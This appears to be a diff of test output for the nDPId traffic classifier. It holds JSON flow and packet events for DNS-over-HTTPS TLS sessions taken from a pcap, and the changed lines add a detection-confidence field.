cN8TOs97BoUvfH2xS4muIblEv23sWDZt8uHBdYWb8qBII2zRRCNz4TWmEJd5WuNBsZajJ6+izq\/kuJOWcsJ\/3ClD+JPyh\/faP5RIOC8TtW52DI8iUXjhh0HYoQNP5CK\/yGELUKYphGmQcP1BV0e5C\/xs86j3J4Tqg0y4WesV3d0jU+gkOa\/xZNpDrlV+JnewVAhCkK2UsUk3C84VdKoqUnp9Pil5XcszuqrrK5fn2Ja3xJCvI9oUZYFRkj+cpcHiFBzHL8vrxujIbPqQsQDehofVoxDKQvUog5ZiOw9rqXCH+rf4pa2omETeM1OE52\/bijRwWFKerGk95vgv7mf\/pTz2jvStIe9mIenHJWL7PEZH9sdGDeZQKhralY5AEfcr8PAGFV0XOY4OvHkHHS\/kY45xH7Heg3RGSUSAkY6LhaxYZOH3vCb8pDwz4M8eJ0\/MawhboSpIfQdoDBfBZibpy+ix0cl6f9YHPnTxwCWpi11t8Y\/Ioe5G719Te12HR1+3LJDUG4+t8UMioCT3GNag7c5mMGY+V+40MlPf33OO2SuBDaNUe80cz9ZjBk5x+9\/8yZnlpBgJheqdBeGVTSfNj\/\/ykzVs+ovI3rQWJ7MtuR80iZzcYqQWbI4RBftGKVwyCcJOskMGArD6+UArYfVGIccM6l6ZaD9x6dkigf3LAHA30iuQXdDyjNpxgxl4iSK0oLixFkkGZE94ONcw\/GLLOMYGf3ZsNLQSPf2qyfAF5BKKKg7FAQid7pqgyCZp5F8XKbACdlEb9Lar38xOjvjnewcnGzD4Z6c9THtqSZcDPbz8aL6DmV9lXZmD6\/ccDsDkRU90nhHSMrUF5R8hxDMoP6Be02AohXJwQbll1wPcUEyYk+tfY7XoP1gsqXecmTp+tusAg1\/AwZK8oozX5LgL2HyoOuByw1lgzh0RLilH5JrY3yk0E\/jG5JRoV\/y41cG7xAhvYbSNXDFCXbKeSVI5tgPheZvJ9ZUyIfStt125MRChKnoA2n+mG9KzbpZpyVz66ndTD0j3XU1kDOqjF1\/SbGf1+fhwWGaMMcZUYzUS1y0NN++mGlj87\/Z\/u1peJJRpJLZAkwhE6\/qyvUgAeD6bdzGa3m+9PvZxqRFg4uO5BEHphZPz4E5S9y+qwaFy+ng2E0E\/+Mq99pz8NTeooSlgjy86miBLzf74wOBFSoHbVN0PHL56xSrx12FRC1SCfzqnzT4BREj4eRgr5sVcZJpcqB\/DJ16zqD31Cdz1F6VAt5mHD5hgyW+BhQO6jtpBgHqFisMVPWD18uXILfOEcLKzexTq0enEqkxPPztMgd3lKJoJoLn9D15r82RK7HhKsmZiDKUuCdmH3DjKAbtkj9uSMWDKDEZ7ALu1TTrcVpMz\/u916YJjVrsJ4zke1Y\/PKCwgQji1xX0Q1uKg+Qhmzj0YA6C\/ZB8hBOasuUjTVZER2lXZpSogcQcgdsx7P47du+ZkiOIevUp1ckurR953sVaD3ci+d3blInJn3V2H1nd41bCStQkPyhbrCiGVWDvB4NjqVSIh6ypL1X2Tez7o9uIFek3e\/KdLnjoJYgUoUCdBCeRBScD+0K+sqvZzi8z7OnTzhYK\/aCGv11HpK88nhB\/fu4rCw6Clf8iUvZmwOIdmA\/mXVezV7u9+Y+L4mJOPGGV+Ie7YQjoii0W0J9zldsek4JrCNAfpxxvmfZTghYCrVQJNlGcKyp+LE4s0nXJXsv8iOBmDMV\/qiHS\/RfVp0Al+GVjFpErgTgXH8uFG0eZxhSX5TnPtc5X3FjIRORKWkOyTX+MlnBU+yWrj3iWALBhonn7tNa85eK0vFJHHFGyQm3hMEk7psuYZdoK61bs1KKeUi4RTDX274TTDnDx\/vYrXCGEMbInwJeEUUq10Y0AUNC+ikXVAlZm5\/6b3SLH1mmyzy5AwgfbHNdBdm2h13eHYAHANjDp++p3nOFwMDARmCniHbpabBh0wmz+4GvD7gEaHTo1WwpHFuO0rRndT2cE+rB3NSEIZ\/OfAhdTV9eadRkxEucZ2zRFouLobhVj7VuatuyZROJYubLXxY0L2AD9VfNIXMUeRNHnXvmwyBiqm\/8ZuzuiYxPVzYGJuS41vYyyQm1ND0\/vWricRWNYCIXjgbSqk6PFYh1FVGYRV8SSt7kE3Z3NtrXGW3LuaKD8ymXSg9dYJ9GwRxcPV5is5NEijit\/K0HuZymRnz0biX0ibyZ3bQdAu+3E+KHkL1KMxQnoIP\/X4lavINi95Z\/1+WkK1enaEAwf7tuLJlq5tLt+JOe3OVPJYXu+hVDAzfIFEvugfqxQ4aetpIOYSy0uy\/8Blk6BuP7s0kZRcDAwBF06XPl0W4alPWKLcZUBV1\/sR9gwxnLLJ0WJlMdAUkQ1CCMVwzdsK8lkkZUPttQ7nY8WKaipYb2yNRvSYmxfuU2S\/nIBiL"}
-00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739390933,"flow_last_seen":946739390967,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":3394,"flow_avg_l4_payload_len":1697,"midstream":1,"ts_msec":946739390967,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739390933,"flow_last_seen":946739390967,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":3394,"flow_avg_l4_payload_len":1697,"midstream":1,"ts_msec":946739390967,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":946739390970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":946739390970,"pkt":"REREREREZmZmZmZmCABFAAB4ddJAAH4G2DAKAAAB2akUF4T0AbuSPuSllAS3MVAYAfWu5wAAFAMDAAEBFwMDAEWr1XNIOucPlOXvVPAlxCVPjuVei0Kv510pke\/KbmmoYPXHQYgn\/dXPL9SYgvzqDxY7NHWdbkgaLyLveAQw2UhT5DxScM0="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":946739400294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"ts_msec":946739400294,"pkt":"REREREREZmZmZmZmCABFAAFMOfJAAH4GNZwKAAABkv84YqrGAbtdpqacr2JwdlAYAfaNXAAAFgMBAR8BAAEbAwPHJz7Bz9zA6vh2mAtXguxbTFdhb5D1tFb1Dou8iu1ITyDK94fArz+mQ8rbbzgPn8nq5li5Q+JT9k4ZyOL9YBHZZQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACsAAAAGwAZAAAWZG9oLmFwcGxpZWRwcml2YWN5Lm5ldAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACADmPqzqEwwIPykBECgQ7iBmKhoGpqhv77PEzGKWzxqPw=="}
-00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":946739400340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"ts_msec":946739400340,"pkt":"ZmZmZmZmRERERERECABFAAuAAABAADgGq1qS\/zhiCgAAAQG7qsavYnB2XaanwFAQBBOXkAAAFgMDAHoCAAB2AwMDsBehTQYQ\/iH2Yhpyf+mLl1C35r3Ho6TovknKnjr8riDK94fArz+mQ8rbbzgPn8nq5li5Q+JT9k4ZyOL9YBHZZRMCAAAuACsAAgMEADMAJAAdACBo4BH+AA5SyDExxRIaGpKShy1vmsbixTg2m2T2NedPDxQDAwABARcDAwAgvk7ezJo1JZP9LjmZFBvdhSYoK5Td7g7\/A2oIAgI6osUXAwMJ2yS0n6M3Ydri+rIgYVXd+jwuTvP8FF1HMS4hAE9YkVd0802YEbU3pHhUuQANn0vXApBPxbj3FV9uCCuIZCOL4zY7+k\/N9QNOxO6wgqwyjpqF\/MSuGzGbkODdKsjr3MXDrOEDT8UY4Cf7sbDSqOIkajzwlllabjLyw\/JVxOtUepEpKMKQWPduyvGLlnSE+4Pi9X1F5dljLFonfMSt9epl2VwSF1nq8Zl4KKstqyQuG\/zmvd2vjAUtpZ7bRJhqcQEAuZwHSvB\/MtIxXfAzVeG47SjsazBlsuRoBS3fTomilsUH4J13\/0ChaLizKxEdSZ2w2K00iVdJ7hQkti8Yk+XaV61AEfwts012l3Az0Ul6QGn+ovAsikUEMTOdEJmAEExk\/NRuYh4YJeat0fT6qqxPxOtp8iJmxclZOIdEdtKfFRlb\/Q3pIWRMmx+BKdsNQm6TtOsUrqgzJEovgnDvaBUadejY9LBbNHqxMK2V6F7gbnGKVjBjB76l32rCkAGXZjYpu99n3pc8VsX6toeCgNv6uuTb2IhBkEMBsiXbrPavcq8F51o9cjY6ri1T23vFWkuEBAAWOdINJTApJO1joFFgFxyMMNnlCpJoVnqu0i\/rinlDFg7S9CtMSJ0Ubb2fcMiTZVA8sg8c2grczf38tyMaZ9tLwrWkyrDaM66WF+r\/Smzgjb3lUh8vJ3yJCEPyKRtiP8bLVA86MJJR6swDhhbPo5TZc3HPN3paBxU5U9DTyACxQnk6EYqYsA8ZokkmQV3rXvd3nlNnXQvP8iTrcL1LydrbGPEmcxzftt97lwfP6IxI3O3sNlij9LY+i3W9W6NVdJf0gVlPHB34DPsUDzGCBqeTZuUD+fgbA8m0vHZeGLaeh2n\/ATJxgu83kBANWSs0j4JxeZwkxA4LQE6k9KdadeiuFQWUUsCMoytEmeRS+e2CKC26bva8V4F4G5ILpiDrVUa9OPpnIugEC\/pCpbfo45ejO0OYsjmcSB9VHs67ODTG8tfG\/HSnEWghmAKv96DqsZyAaTmkT0JkH5FkXlCzBQ8v8o8b6rSE0lRW\/lesYflMu+sWf50UV63CFJyy6fgpaJPxCw8SCnSJ9Wfe5036kFXS9TxM7sPwyghnAoVeaf7Fck3c5pxthPEaz67tzSOMeekQJOQi7xMcEt3jcaR5XiiPfvpfvbXLOiTYOMcz4nBR25XpUeWEHByMxgi+V+13jYe4gb5oIp\/OYL+ldNmokkEz0NkrXv9PYcDVxLHdE8YvZjA+Y3MOkWFCk9BM\/Rn01CyqbL8CmN\/DvCsMgWqz9BmPnWHQOqMnYSTykXgSFe9FyeKoNSng2DkGXmS4Ish3yys0i\/QIlGlT9piLrC2UOh5tHQYhdkxZTzWOLoSNhJgdpKplLIWgmFyDHNvrhDmwq50tATdlnRMhe0ry66PsM3l0lek7HZ1iPpCZ7a660QlaPE9SZFbRD2hjaqHqZrlPWWwgi6eHfY0gu5vY3pzyuUgNc+IY+oeDLEyaB3ysUDN7Sr1IZYyAtSiOnN0WLtHIeg9uqvR4NEBF0XEfeRxZT0n6RrygJ1nWV+kailDfsz4vklZfPYltDFOyTnwOyyzBO2WpBi+QHoJdR5a+ci207f4TAHC5iWzq9Ov\/CBA21s0iwXcKHtUUuFkXfGsSTcHlMRdWRoqqdrwRmUkHc5FaU6RNse5tyVEdBKfOwfXkDw8I22zIDBmTO4YVBH4Dzw0SEVpSPVqE8m2STbZxIzmRtVGFxbw45tbGu6NUyHfb6XRJMV4vKdl8h+lVfwIggGdSBSYb\/J2WkIjXI5Z1\/s5OXr498b\/Ul1cfjj192V+QV7YEDHDJ0wunGAConliOcHcZIZrOpVaNMM7NeTBxiiUgynpVWjltr\/LQuk0Pld3mEIxmwXht0KmUnXyCvTBJgPYroLRuneYRQPZ1JOgkt\/kdsQBmYrZvkRHKWFwNxkLAhypRqmOoE6eO9TYZgchFtH7ouVK4C6vE0wlk\/wNdktEQVjtjEf81TNo\/lytMdDE\/EAGs9weyRqd\/Hmz5\/6yLIgAilI7sqB7dEuE0iiOXk4T95pQbOjvSnwI7M4B7Q3oDNdWJJRZNp2tZGQNCVfj0OFzEKSZbanefGx8qbWewy7Iup5wriwLbBG\/B7ZFkxdmUnEdpL4pTOBRMxGDxRjV5ioqpujq6Ef07dgH3IGRgJHxsp9J2Qlj8S7lCwwOsTDkI+PhLsXzzIudX\/ZiC+lH4Tm6LciXTHf3hDkr34EJfXHJ2WpSeeCsJZBkZx0OJpBR3y1cyrhzb66IxG0uSRnndSXXBNAmD+Gghsj7Kg4E50GUXibzQRhDNRs87q1TvRNjyYI9h\/opUmKnHAkXz4SItfTxaX2LIVbjHXv1XndcnuHwhJgHhiVGswZvXlXVlX8K4fGgnhgpZ7MSQN2lSYmnj2j7A1n8u\/xbD+JqpDU+SOMNWtYlDQ0M+WzoE91BSSQYj6pIr9DxppqLCgUAfJpZxJ8YTmINwfhMZVMPhUF+vys97o5XgriLF7uzxf2I4907edC79eKV1Vf3Ui9qrIThroIUvlpq69fVaplHqZXdbs+zwj7e2bSPVWUVR0G4cA3aU9fbVCQvpl3a\/SuOWAYL5O1\/gu5GJXDImY\/gEO1xe+OVqS2aF0XojyeNtILIeW1nDYyaMtRMD0J7qIxHbffBANlspXb0qgGJLXRsdV8\/\/lQ9fV9vIoHgsaUsdWxpVNTmqaQBhX+l7X3gEUnrZ2jVkY6Oh5aU+eYdso\/pGSL+gHQ1M1e6uj4SYxfEhZHY1voW\/zrjGcvC2BmpxPhTrZRQE7Z8GgjqyG\/K9Af758C5W6bNB\/xr5yeKDI\/G5cyIFeblO2dJmHUb92Zs9qV6hqZGonI7Nft2QsKRvSQjz6cpX\/ZVUA+5e0AnpZpXEPBjJfZQ24FXs9QBvGk2XnWW8Dboig8I5f6Aa0W91KG5sO3Doyp3jU3SQ\/ah58ZIaBgplOwc2\/XF6kzcQLnHv217TTOCL7ScT90UL1M8uz6xGKTqy83KCKRxOqCSmaU4GimFhTvfwqF7ljKegUp6S9OeYOOt+VYDC0UeVysX6yYVwgIBxXA8D51WCmgGdUznHhIQtp1cWWN2T6pBItiud+sR32LmiE5tMUZYbwm2xu\/Nih47FXpRY2xq\/SEOEBCWv+pct34wnV4RwGw\/IvRU9BDEL1I7Sc1UFJRrazHP37UtPsKE1Z1llTnptgsNBNnDluQKifySFsqvXdr8Wwvn6V56upoM0fLxPG\/\/F6OVsniKNnqDtgpVsVi86SZ5O9M+5OvtEmUD8hQl4gxL2QqLYZIWV6vswIZSATUQuw0pUlpiEaj4PymXC95\/5pMEQnYMyOGFn2xcDAwCAmr0Gh4ZNVa+hT2Dwwrpwf9EMB3SMWmSnSLNfZ1YP9lq\/H3H\/YzkchSbogwVw+NXvSKa3Q5dILWczbhkBruescLznbqY0DC+TTlEnvK+mjob5wwR3lQsp8odDMfmh22P3SAFc1ZvCoRb2GkaVN69lxvgMa3mO7aDcfiHSTbC8C9cXAwMARePoOyVbKZG3xXgBtpg5jANBShpYQchD5Po7jBmjBEffrOCijDBbST3aotIn5HBfw8iB7gJCrbmWU17Z2peLW9KOid+9"}
-00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400294,"flow_last_seen":946739400340,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"ts_msec":946739400340,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400294,"flow_last_seen":946739400340,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"ts_msec":946739400340,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":946739400340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"ts_msec":946739400340,"pkt":"ZmZmZmZmRERERERECABFAAApAAJAADgGtq+S\/zhiCgAAAQG7qsavYnvOXaanwFAYBBNMgAAA9gAAAAAA"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7440000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":946739400581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":341,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":341,"pkt_l4_len":307,"ts_msec":946739400581,"pkt":"REREREREZmZmZmZmCABFAAFHpuhAAH4GfboKAAABwUZVC9OUAbunNzlTos+VOVAYAfbYRwAAFgMBARoBAAEWAwO9Yq6mzn6Kf+YkY+w4Q\/vo+7yhlWhjohroCY4Mal823CCy3rkp5WTaWd5nTdItXIFahRCh9ETfjIRyGCS4r9a3XwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACnAAAAFgAUAAARZG9oLmJvcnR6bWV5ZXIuZnIABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg6wutcF723xZ1OaF0ooDfgy7xahyBeOD2x7PNk\/t6gG4="}
-00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7440000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7440000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04375{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":946739400612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"ts_msec":946739400612,"pkt":"ZmZmZmZmRERERERECABFAAuA435AADQGgOvBRlULCgAAAQG705Siz5U5pzc6clAYAfXigAAAFgMDAHoCAAB2AwPum08l8a\/xsIE7sf4ouj1cFjIcJvTzL6IcltC8x2MVWyCy3rkp5WTaWd5nTdItXIFahRCh9ETfjIRyGCS4r9a3XxMCAAAuACsAAgMEADMAJAAdACDFCe5GcFoAINJ8W\/U00yxwlYg7Wtx0yaBhsZxlJVHAahQDAwABARcDAwAgjb6\/bt9RU3n7f\/XK70kHoogWe0pWzujxYyDQFCzDS9sXAwMKFyLHVFWncnvuWpj00oLMIDtr5tAZiqfcqzwOOMNYqfKKQHH219coqZSx1dHk2hi5d1LB3GytI8vYkc59i5RQQDbXAHUuezlbBvO8F+B3yrBrypISyNX1A4sx1E9x9g092nWO74tZVT++3VZ86RoDvvF0ZUqxTSHr+1nR9kKZh0N5lUkvTu0aK5ORhVWNfmq0hwnrW5s27rBfHFIN8y0h27yxFq4SIl7wwuk6Mq7vkrvqIsM5xqyCc\/9Xu0OqSF3zUNnkItIrGQeIJp3LGwwIhQxxQAsnuWmwcXNFRqEzMD5jbEtpKYkHahCBuU\/B3PKrCTX8+YsVVjGS5Qrjne3Kr5FWp6nlPfIH59LkIEasv75h75FcjD+7wr54z1JIPpP7ZrLR5PywuD6f88xvloKZN+WwiXGAie649c7JKsyGwCn507cb9CeSrJLhgRoQlUSUEBlnxiSHhJ2mw9owqvmzHqRqTxGrXh9qTPYDQpk5QRLmSGX3D7g6VS6CrNB+GfCK6SPMgzdR+k8lAJJdHOY0ZZdv+Ya6nA3r8RDkXrspyuJsV4QMPLAoNzQvGen9CeK5JxcSLtBMp5q0B1DBO5EIcsoLQQ6lCwlPm8U6NZmJK6eA9zbgzP80r8LRBBpZx1beD6mw3j+TpFAy+igQ8+ETtD4YPbZPWCgC6xVG0u33AvPq8sRsHwGqnzJp1MW\/CDUHInzc9xT9j80aqrzF0XcmMIsrs4KNMQ8QDQCsJmct9U0iMbkLXGLFA32BoRsU95KY+6gDs57twsE3JaqfYSuTq\/Dlicgoiy07U8DZsIf1tKivKbhBZS1qr1PaAU2W3RuJy+8koP4fg1irOvcozqBrDOixlNBNoG8ob7RGwcT3Z0ArR3tWTeHxhQydU29KSYU8HwZniOUgn1K8cz071\/P8S72m5u89j2RZsoG54t+A\/1vLyZMsjOXjwepn9YLOohxBXEIx84KuxUh3bAga+k\/yE8GW5vng0KtP1aBiU4Tc6A+REN2DA3ij6lHoD2sFhJA2fLcssM6OpAK\/moM166igfSm3LqGC4gK+TDj4gtClJchy8bvN8tctQ8iFjFj\/6qv7lxplsZ49PvHPbnKju\/tev2fd5dDj7QcMjqNvhblPBUZ32SOOjxBH3RE7aBpBLMz7W1\/NpSWcgM15pyZsPx8isO02KbyH6gAHIs+ZEGj61i6mnrDsMNesZUMUM55VeDXhdpD8kmxGJpLZ3bsJ69dZmjx3Rf6Zgw2KbXhlm6KMoEBrRSd15+xgTimUz9H5N6PvNLfaRiGX8r4RI6AIPrxRNjrz1JtdmeN1NzdaLUaHCvnql7jjxoX9Sn8xtUQxnkcUzYoweeIrvi9ulLP7ucnd54p